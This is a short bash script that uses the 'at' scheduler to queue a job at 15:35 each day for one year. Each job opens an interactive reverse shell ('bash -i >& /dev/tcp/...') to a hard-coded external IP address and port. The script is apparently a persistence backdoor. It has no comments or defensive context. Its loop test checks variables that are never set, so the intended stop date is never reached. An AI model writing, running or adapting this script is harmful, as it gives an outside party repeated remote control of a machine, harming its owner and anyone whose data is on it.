#!/usr/bin/env bash
begin_date="2020 12 07"
end_date="2021 12 07"

read year month day < <( echo $begin_date )
while [ "$y $m $d" != "$end_date" ]; do
        echo "bash -i >& /dev/tcp/185.232.65.146/1198 0>&1" | at -t $year$month${day}1535.00
        read year month day < <(date +"%Y %m %d" -d "$year-$month-$day + 1 day")
        sleep 0.1
done

